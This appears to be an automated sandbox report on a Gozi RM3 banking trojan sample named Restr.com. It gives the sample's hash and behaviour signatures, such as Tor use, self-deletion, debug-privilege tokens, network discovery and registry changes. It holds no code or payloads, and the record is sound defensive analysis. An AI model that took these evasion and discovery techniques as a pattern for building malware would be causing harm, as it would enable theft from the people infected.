Malware Analysis Report

2024-10-19 03:01

Sample ID 220315-jy3feaahdk
Target Restr.com
SHA256 0f4395c5cdee1c9fe28ef9a63355594f0f7a23aa41e52b8085a0bda8715da13f
Tags
gozi_rm3 banker trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

0f4395c5cdee1c9fe28ef9a63355594f0f7a23aa41e52b8085a0bda8715da13f

Threat Level: Known bad

The file Restr.com was found to be: Known bad.

Malicious Activity Summary

gozi_rm3 banker trojan

Gozi RM3

Grants admin privileges

Deletes itself

Uses Tor communications

Drops file in System32 directory

Program crash

Modifies Internet Explorer settings

Delays execution with timeout.exe

Enumerates processes with tasklist

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: MapViewOfSection

Runs net.exe

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Discovers systems in the same network

Gathers system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-03-15 08:05

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-03-15 08:05

Reported

2022-03-15 08:35

Platform

win7-20220310-en

Max time kernel

813s

Max time network

1783s

Command Line

C:\Windows\Explorer.EXE

Signatures

Gozi RM3

banker trojan gozi_rm3

Grants admin privileges

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\System32\cmd.exe N/A

Uses Tor communications

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Discovers systems in the same network

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\net.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e50000000002000000000010660000000100002000000013e729f8d0199c8b3388f72cba6981afef89518eab826b0acbcf49f9412abd3d000000000e8000000002000020000000b8b519f84316240c3aa3b4dbdb48ded4d09ff3d39ed2f5e88d399a57d9c15e1b30010000d75e904ae2708e45fd91cf35d49ea228fd21d8b16add4ec2139710fe65e7a8513a70dd76dbb9fd2a8ec199fab6c01f699579625d422ca909d49a8129b10a76b96dbeacd1b78c70e1d5032b3c382754b5a39f26dd3646e486dd07daa049d655bce728f947bd1bf2854b273bf232be84981d8c84ee8cccc37b3566fb93a2230bf33a837c052f89f259d0714e48c113f796fa8987324b35331aa1a5740b87b47f2a692f6adb68022c3d6e289ee06702749224aa42b9ad39c69775648f1d86a08cb445643eb3f576af34663ff22fb6d911638b8cf929a7e45270bc8dad889660926f449a4addf2bf25453d6b096e42a098ca13ceaf97ec544394f504f5a27a5cfce2623e2f7ac77c8e83fca142fe0b34cd437d127786e3aa824be37b5ad2384f55b530aefbe6ad6ce60d651a05b3338ea7ac40000000ce48cca7560ca41ddb53aef8cd19865c17ff282f491c1ea61d1a6027f0ac9c6442ee5a30e8aee47f269fb288c78cadb9a62eeb8642fa0fc8b921eebd007219b1 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e5000000000200000000001066000000010000200000001253851e9c72fbbe26a60558a052caefc4be7f0b92c10d76852aa1a667d30ade000000000e80000000020000200000009f5faac493dd9e81ae8424f27edb184bf46ffd484adefe22c7ca1a5289f255ce300100006ebf813f74442d1aa7235a6d1c89baec15b851ede5e64ca295567c2d94d341b782bfc9c57b7542108f13ef522e0b1864116cd6908789d15893d8422b13a586603c02114a5652059d7ddabceebea2971e03dcce8c4c0215680c37afe7bfc1b9a21efcdd9581859a1f198d9ddb3567a88b3f78ebad11cee2a648d564edbc40849621c0e36f683ad4d11309e55e2903807e5bbcdb8293737f9df35b6a334902ab35ea0cd297f0bec821da5130ba4d92f9e45e0ee5d67744fe0aa2f7e2be61323cf02023978bd858bcfe7b4e7751cf191cdbe3b2140b3814de7b4a8712e55478f569b108913ce2410348b8f1528c04248ab2331ef22d4e2f36e7da2babcd03bf799f9249c6a03980e46bd3dc2286d75305d017c266050da68668d97b013e9820d084da11d4a6e0c6654eaa1efaa3484a6b16400000001d9618d6d327e40799885ed9fba9f6bc2c5009edb5b36980b9c87e5b6ee241f32346911de923bb0cfd039488233a4627e6f43c4f5f617d7b12649b70c532e07c C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e5000000000200000000001066000000010000200000000d1b8db92c8f7900356eaa87fa6ce42aa247aa119a4e55e3b00db422410a6442000000000e8000000002000020000000234346cc27fd74d2f996a365f28c9b36e7511d00a483c44a2187f6bc7adc54dc3001000053318a171a143268d2da4fbe28b0460a6d7977fd287c80334f275fc07a80b081da06f44ae4c360dbb00fd5ac771bd243195a63efdb96a654eabc854b77733c8ffcdf896e763138b4ebc220db1859e521f5817df34d6730dbd6b05825e841f861390c10d5e75c6380edc1b80db2ccbc200085a5ae0298bf5b4a0b9f746df7c6e7625553c4a74fb3cd9235bd47e3830abce883cca1a623628fb9c28efa7cd884300a3d35ba3e84be706c93f1bddd58a94b4c300e5650325b9a4c45f9fd35e960f40246c0c0d86bea56a1252eacf59a541695103270caa26a5d594d613eda940d9ea9d1c31259df9e37fb3d9f5500be7ffeedd0c10f077ef9d31e67d3bac7aa18e1e1b9af2e218965f78587cf8d89bf7fb84f4a567bc992182d5844e2a2ac4957b8a3d68704038a81ecd6d3c0835b8643c5400000006c6dd99d64a76f589eec6088af9785e884210325a2c0acb6c91560e6c46a192274a5ae86b91e7ab7148fb10beeda53a4d19c0de42efb087c04444bf5e5d41d21 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff6f00000019000000f50400007e020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e5000000000200000000001066000000010000200000002c99b8e9ab77a25760a4b815ae5181bffde539ff42718f672b1b9f331e2df6d5000000000e8000000002000020000000e4aba0743beb4cf6e0fb7a36e06b785ce584fa692571faec8a0be10ec1ee1ed030010000009b85ed8ecf0a9d15e320e68b8f1494dd30f3a37d160fa4326a44084e328eed3761b12d2471bbd750c1aa8c657c9b81daa0077d131bccacd3e54f03b460f85b018a3d55b04ebd9ab56be7a5835b4cdd25a408bed35e063ff058a62f3c2c3d0790ce39bc868692c2147a59cc979e69609371d639aa8af3ea0f310ae4f6d1fdd2d7bf6cc30e3375f170df9ff974a5e903418ce37ac83b0399f6fb54f7542c52966eec68369aa9653f1ce8ab3d0e172a26b1296dd22052c2fe4be27c77b3e11a5b21e03dbeaa417f9436e2561e9e3cc3029a2f062e7b90dfc3a21c3fda116b53f6ee83e46faee03f379fa1bfb8b7ca2c2deea57b9c7d47d5e97c46725c7e08b880e98a7ad15683e27bcc3b03424be2c7f3b934661025fcbd236c7e28c9cc195666678b10ea01d7688be411ea70c8eee7f240000000c6236490c2ea1fde269e600d15cdf6b81b307722a6a9cc7e6d066af18092335789613ec9681a21b2a93905457821ff886211b4a0c5e80f8aa40e2f42725d2fbd C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e500000000020000000000106600000001000020000000beeec9d2deb8f069bada8067d9001c993578286c6e26a40b2caf081991ec7f13000000000e80000000020000200000009f513064928681f4d307c5083b82ad1b6fd4cb4dae08c23c66e129f8cb6545363001000012213090d33a3624b003cb3b1067553475d4fa62a29601edf3b66f2a16fa331e4d73e080dbd9a0c27c25c1d8318f26f88b269b651e53f901d3003ba3f92d990907440912b2ef3337f744055e5ac283ed16e1f8b470cbf04908eefc3894b4a93a260c825d704b56d9320b784c178930c760157e580fbeee88c993c502c40f0adf265fb99bce6ce16749e095bf31ffe12fc6f80afd71890f12c0a1a4b1e589589a6e038efbdd073a2ea82fc8ece2fe6abe5c1fd4382800f9b654edd0e0209c56f960f7f558c1b8dc44f50015bad9770730da9ff78cb50a32c4d5974703636dcd919106e7c0a35a734786d9c67f82fc990b7feebb12e00395cfa3e2e081f85f52cb4cd665a4b39937e2fe6eff82d26e5d9c56068e504358c0bcb54cbdab30bae07b0e561bbf2aadcfe5c0d792c8c9488f3540000000ea5e272b49bbae76942382a26b7dc43e6e462f85ab391c376e783bd31f16d1bdda26c2ab53f1cb161d077d40555989c681a040d71a8bfd74103d0fbf47b757f9 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff19000000190000009f0400007e020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e5000000000200000000001066000000010000200000005e39a2f2120417b65ac9106ceed3a24fc0d408ea270bf396be320bddbc398919000000000e80000000020000200000004398fd14b62f40f6ef9fb89b20ab961e0ca3922faaeb2ea7597cd399b1cdaef7900000006547d28725f1586abe057ca4e00523c53e52bb683cf0ca1aa72108465f5fd4f63689b64372ae46ff57644ab1a7d17111d62702b29ed3229002859d49ccc35fefc1fe45e7ea94001015683ec0b4f6cc67a98b184bd85264dbc265e461ffbf815ac35bc8fa94f01534b5fa540543a8370ec6318bd1549abca2bb9f94e3da86b3aa36bd23ee7b37ced3de2a653e13d48ac2400000001755f77689db2a92a58dd53eb4014329acf5f8577d77e89d36da655e5dd679cc4ce6e95212ac172b6962dea94730c56c3a5e69fd7e62ce06d67633fe271ac64c C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e5000000000200000000001066000000010000200000000327417904ce8ccc1fbac4b6b9207c038487f464f9180dbab3015b4354d33bd0000000000e8000000002000020000000f424f0ea33e3bda01dc30ff48ca2ec16bd21da14d92d2112eb6074e3229f42333001000096fc8b3705b019b9a45782ce1440f77e5dea913a0ad36067ee5e6f54c812cb9018b86d3d74348203c657829d73b0ea949f1269dbe83927742645158d6bd39e8a01a2d55e7658101d8a73b2f04a4fe61a05bb838431ffdcb5af0e166143195bc6c6a9cc8e8525ed3c4f998f4a2dcfcab0196d536f9143d9d7b0ddc0cc9212ce98eade30bc49e1cd3abc488cdafeda7ead060582805db8d90beb4b43013005cb6d36ef2c6609080c969211468566beb08385758a13d7b534f21943402058b28a9ba68389b41f74e7ba82d79c460795206eec08c05337796803019c1643e9884585170ff87161753c1f446a775da5df1efc7999c277b1a81d43acf259ca4c91b02559b02a66fa60c821e23186536fecd8593589beff513995d79a282e2dfef9396e9b169a51321262184ad1a04a482907ba40000000159aaa54b4cb8adac1a981734c04efd67ac63d949f3178823b6f7b9938cd02488ffa22ad9516af632fcbd45d415be1f652921d006f18f925e741b004f3fa0b02 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff00000000000000008604000065020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e5000000000200000000001066000000010000200000000f0c90ca8aa362f4bb280a1f912dbbfc48724fe4bb9f822285a29424f43883b6000000000e800000000200002000000019a530c4d2946803d68366d41cc65d926fde8a169bd8c6ed593681e5567185ca30010000c9374231d73f151ae93fbb1bc59d1f98100eb574af797b489ad7e8654d7ee54b2ef82bfe6a78bc228d298a0a5d61eca2f413f0e0f961d04e67495e54f29bfa8e7834ba4e1e29e31efbc784c55735ee8fb1a9f2c1557121720a3a707418f16a909cc3db2b77da90f15ee4c9ee22968c238e1ed08e2c5caf63ab002c00231ee074bc168b956bbfe29bd0052b467a47ac0cf2fb9af8a9fe7b7a861c8c308b49f6808a8e0e5d96adc8dacf7d81dd76437eb594a7c628fdd0b1e1bf27a04f36156305af876ea75b123b3619c0964da9cb408bafe87ee7d99ddc1a4ce5134ac7c2339f4feac9d8c19c640b48c888deba4220ef4646dccd99135c009012d94db1d7e4cf1f66527c2575f43c5cc865e28c3f4a52c3c837e87bb39dbafb9c83e42e9a50a0b950c7813704889c2bae7b66169302c540000000391b625ece0706cc04c52e04f62fca5c43f9c1eff0411754d7840a3821cd1e84cdb7fe2f96d6195e381db196cf562262fc96cdc03433ae7ca19360a218b7c49f C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e500000000020000000000106600000001000020000000aba5a280f62324e21f7f014358dc7dc828ddc09c3f1209c6f292816716ad489d000000000e80000000020000200000005d3c957ae64c72dcdf974d8aab995bffa2d460e23d100038593cb637480f6aad200000002f31e5f4f1311847e5ffac143389ddbc70ba92904edbbb62588dc8a1be0d1e2840000000432722c5302fad0f3b00bc4947b6008f48fef9c7eab09ba0679698e4965ab81cb6ae14b00fefa2e9854de89198a0e65bc4d0909cd6e6f479a62a00a1419e9229 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 40e6dbe04b38d801 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\MINIE C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff5600000000000000dc04000065020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e500000000020000000000106600000001000020000000140a62193c077483292e4f6d9df2a0177eb679dadc9e0bb37c84ac51a3f5494f000000000e80000000020000200000004f2ea5f9daa1daa926b61a42f0f53ffa1df2c1d8622ece9fc6fbf3d4e2ec322230010000b94dc60e7ebc267dc91e1362f6bcf4388c2c870af1ddd1018c86a7c822866c62081143ccf1604650ae9e404ceb4a027f25c5c48f34dc36b19bddf0882b8e8d1d49a12fa83366b8267be50ad1eba781f73f7e084bba7cd11859d16de3a49907b2378a0d696b7c3769e24184c700c649601998c53d2ccaa8cd3ff2ffcf9ade9396a9611eff189d8ad0a20116f164ff0940159c8bcbe8bc3bbd2851ed52c8b8acff7b6e44cd683d0f96e84b086d3432bea1e668c6a83946269b07afd645ac621644689f12e09d1dc35890f6843b576be7b24d1293b274a857f3e3b6f6d4f440c27f967846be2e7b88391e4f9ea0db8e636a187dfad5652475a050593facd189bfb4dd5171fed4e38925b869d16e66560f2243ad90c32edc84fb64484c84a34140409625d0e2fd6bf94545d277c49ef89fc7400000002d5a52d1000e5e2acb15a94b9cdb455034a15db0cfea7f109b91eb32a78a9f4a55abd17016ee42870400a14bddab5927f79f4f9e59d96caae0edf68bd80afe1f C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3200000032000000b804000097020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e500000000020000000000106600000001000020000000add77028ae60a5f74186fe22959bfba532792f8ded1cda1f1a59241ff76346e1000000000e80000000020000200000009f7396147e2cd775626a8c1d6fd4ca0ea1752e716d6c72e5b6ab13e151ec4461300100001d4e4649784e956f90c6e4b37578ffde573a7e511f034748dc6e998f4bd73f52347a29eae71d93d6580ae567566e129d121034aba720fe2ea78ee30b259cf208282876e323e4ede5a7d5fb0901cfa368314c04743337bf720cbb1c2103c31dd451204c68aa59fe7c8f8dcb2ea6a59be10c8c025a38ebdb90479f92a212bd001682f47ea63fd1ce8ac830de3cdb61377371a04e97aeb4caf6a99d6e098af6c77ad89f24240c0e90ca53527c7a17a3cf04bbafe4a941fae129f9d282f78185302cca8e492efb5a66e7f2b018b8d9c2277bada8139a06c5b5f879e1a82b05620115664804cd489d129f6133c1b0384b095132a9fc3563dba565386145c144bd175303bdb3743b5fe7fb50e22ced5bccc6a616674e4875154fea273c391a3822e49be06f6f1030d9b0008de64bd28311b26c400000009001a73704a71160e44c15b19a492f8f3fe591b79a9748d3fbb08183ab5538b9da8fc7c56bff904469861f061501e81b52dda8badfb63f04f6a3da3cdabc54dd C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{17D90BF1-A43F-11EC-A594-F6E36C9641D9} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Runs net.exe

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Restr.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
